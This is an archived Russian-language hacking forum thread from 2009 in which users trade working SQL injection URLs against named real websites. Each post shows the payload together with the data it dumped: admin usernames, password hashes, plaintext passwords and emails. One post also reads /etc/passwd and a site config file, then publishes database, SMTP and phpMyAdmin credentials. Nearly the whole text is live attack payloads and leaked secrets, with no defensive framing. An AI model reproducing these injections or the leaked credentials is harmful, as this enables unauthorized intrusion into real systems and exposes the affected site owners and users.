ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7621  
Старый 03.02.2009, 12:44
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

PageRank: 6

Цитата:
http://www.sa-venues.com/explore/frontlineafrica/itinerary.php?id=-150+union+select+concat(user,0x3a,password),2,3,4

,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24+from+mysql.user--
http://www.sa-venues.com/admin/

root:*34D244FE504DCCF2C76FE6089242805D0ADC267A

Database Version: 4.1.14-nt
Database name: yokel33
User name: root@COUSINS.rch.onsite.hosting.co.za
 
Ответить с цитированием

PR2
  #7622  
Старый 03.02.2009, 14:56
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию PR2

http://www.jouanel.com/choix.php?lng=5&parent=-5+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),data base(),user()),5--

Database Version: 5.0.32-Debian_7etch6-log
Database name: jouanel
User name: jouanel@85.14.138.117



сайт тоже румынский

админка
www.jouanel.com/admin/
еще интересно вот тут
www.jouanel.com/admin.back/
 
Ответить с цитированием

  #7623  
Старый 03.02.2009, 15:16
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

PageRank: 5

Цитата:
http://www.ethaicd.com/show.php?pid=-43445+union+select+1,concat_ws(0x3a,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+adminname--
ethaicdsecure:d^hxbjowrR^ipN0760

Database Version: 5.0.45
Database name: ethaicd
User name: ethaicd@localhost


PageRank: 5

Цитата:
http://www.olomouc-guide.com/eng/index.php?dir_id=-456+union+select+concat_ws(0x3a,name,password)+fro m+_olomoucguide_admin_users--
вывод в шапке

admin:admin

Database Version: 5.0.51a-3ubuntu5.4-log
Database name: olomoucgui
User name: olomoucgui@uvirt15.active24.cz
 
Ответить с цитированием

PR3
  #7624  
Старый 03.02.2009, 15:22
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию PR3

http://www.vaccin.ro/index.php?s=6&p=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--

Database Version: 4.1.22-log
Database name: vaccin
User name: vaccinuser@localhost
 
Ответить с цитированием

  #7625  
Старый 03.02.2009, 15:26
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.cloudsat.cira.colostate.edu/dpcstatusNewsItem.php?newsid=298098760+UNION+SELEC T+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Vers ion(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71 )--

Database Version: 4.1.10a-nt-log
Database name: omicron
User name: aims@www.cloudsat.cira.colostate.edu





Цитата:
http://www.pylones-usa.com/pylones/product.php?product=428098097+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--&category=2
Database Version: 4.1.22-standard
Database name: sarut
User name: hostsaru@localhost


Цитата:
http://www.pylones-usa.com/pylones/product.php?product=428098097+union+select+1,conca t_ws(0x3a,user,password),3,4,5,6,7,8+from+mysql.us er--&category=2

root : *64AA67B0A3F7FBAFE6E4C07862C61EE66AFE40E6
 
Ответить с цитированием

  #7626  
Старый 03.02.2009, 15:30
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

PageRank: 5

Цитата:
http://www.jkcement.com/HTML/management.php?dir_id=12&type=-1+union+select+1,2,concat_ws(0x3a,user_login,user_ password),4,5,6+from+admin_users--
admin:0429d0a901e5afb487e88c8fc2a95f17:billclinton

Database Version: 5.0.51a-community
Database name: jkcement_newjkcement
User name: jkcement_newjk@localhost
 
Ответить с цитированием

  #7627  
Старый 03.02.2009, 15:36
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.abi-trade.ru/memory.php?id=-315%20union%20select%20version(),2,3,4--

Седня нефига не рыбный день, один сайт всего за 3 часа.. Ужос =)
 
Ответить с цитированием

  #7628  
Старый 03.02.2009, 15:55
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3

Database Version: 5.0.37-standard
Database name: dingalati_firme
User name: dingalati_cis@localhost



http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,usern ame,password,email_address),3+from+dingalati_ads.o x_users

compitserv:c478d1475034678fb22684a7443cd04fffice @compitserv.com



http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,user_ login,user_nicename,user_pass,user_email),3+from+d ingalati_apg.wp_users


admin:$P$BFljCZY9nDTLPm9Ey5C2SFJxMMp8qw.:admin:a@a .ro
Viorel:$P$BpftK2RsBOon8wGBgJRxy2tFr9PvRG/:viorel:viorel_gl@yahoo.com
 
Ответить с цитированием

  #7629  
Старый 03.02.2009, 17:05
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Hosting / Indonesia

PageRank: 3

Цитата:
http://www.solindohost.com/faq.php?type_id=-6+union+select+1,2,3,groupconcat(username,0x3a,pas sword),5,6,7,8+from+solindohost_admin--
http://www.solindohost.com/admin

root:root
webmaster:solindohost2005
userasswd

Database Version: solindoh_solindoh
Database name: 5.0.67-community
User name: solindoh_newslh@localhost
 
Ответить с цитированием

  #7630  
Старый 03.02.2009, 17:05
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/form.php?id=879887988+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user (),database()),17,18,19,20,21,22,23,24,25,26--&calendar_id=43
Database Version: 4.1.21
Database name: aupcalendar
User name: acandia2007@205.178.145.65

/data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/form.php


Читаем /etc/passwd



Цитата:
https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/form.php?id=879887988+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),0 x71),0x71),17,18,19,20,21,22,23,24,25,26--

Читаем /data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/cfg/config.php

Цитата:
https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/form.php?id=879887988+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x3a,LOAD_FILE(0x2F646174612F31312F312F37332F313 4382F313037333936332F757365722F313131323534322F687 4646F63732F61757063616C322F6366672F636F6E6669672E7 06870),0x3a),0x71),0x71),17,18,19,20,21,22,23,24,2 5,26--
Получаем

include_once("phpself_scriptname.fix.php");
define("dbname","aupcalendar");
define("hostname","205.178.146.23");
define("username","acandia2007");
define("password","AUPcal2007a");
define("smtpuser","acandia");
define("smtppass","paris");
define("mail","candia@aup.fr");
define("adm_mail","candia@aup.fr");
define("TEMPLATE_PATH","template");
define("date_of_install","2007-11-11");


Заходим в PHPMYADMIN

http://205.178.146.23/


логин Admin пароль acandia2007b

Админка

Цитата:
https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/admin.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ